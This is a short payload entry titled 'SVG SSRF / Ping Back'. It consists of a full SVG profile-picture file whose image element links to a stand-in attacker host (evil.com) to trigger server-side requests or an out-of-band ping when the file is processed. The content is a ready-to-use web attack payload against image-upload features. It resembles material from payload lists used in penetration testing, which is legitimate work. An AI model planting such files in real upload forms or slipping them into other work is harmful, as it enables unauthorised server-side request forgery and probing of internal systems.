SVG SSRF / Ping Back

profilePic.svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:xlink="http://www.w3.org/1999/xlink"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   style="overflow: hidden; position: relative;"
   width="300"
   version="1.1"
   height="200"
   id="svg3202"
   inkscape:version="0.48.4 r9939"
   sodipodi:docname="googleExt.svg">
  <metadata
     id="metadata3212">
    <rdf:RDF>
      <cc:Work
         rdf:about="">
        <dc:format>image/svg+xml</dc:format>
        <dc:type
           rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
      </cc:Work>
    </rdf:RDF>
  </metadata>
  <defs
     id="defs3210" />
  <sodipodi:namedview
     pagecolor="#ffffff"
     bordercolor="#666666"
     borderopacity="1"
     objecttolerance="10"
     gridtolerance="10"
     guidetolerance="10"
     inkscape:pageopacity="0"
     inkscape:pageshadow="2"
     inkscape:window-width="640"
     inkscape:window-height="480"
     id="namedview3208"
     showgrid="false"
     inkscape:zoom="1.0666667"
     inkscape:cx="150"
     inkscape:cy="100"
     inkscape:window-x="49"
     inkscape:window-y="24"
     inkscape:window-maximized="0"
     inkscape:current-layer="svg3202" />
  <image
     x="10"
     y="10"
     width="276"
     height="110"
     xlink:href="https://evil.com/image.png or whatever you want for a ping back"
     stroke-width="1"
     id="image3204" />
  <rect
     x="0"
     y="150"
     height="10"
     width="300"
     style="fill: #000000"
     id="rect3206" />
</svg>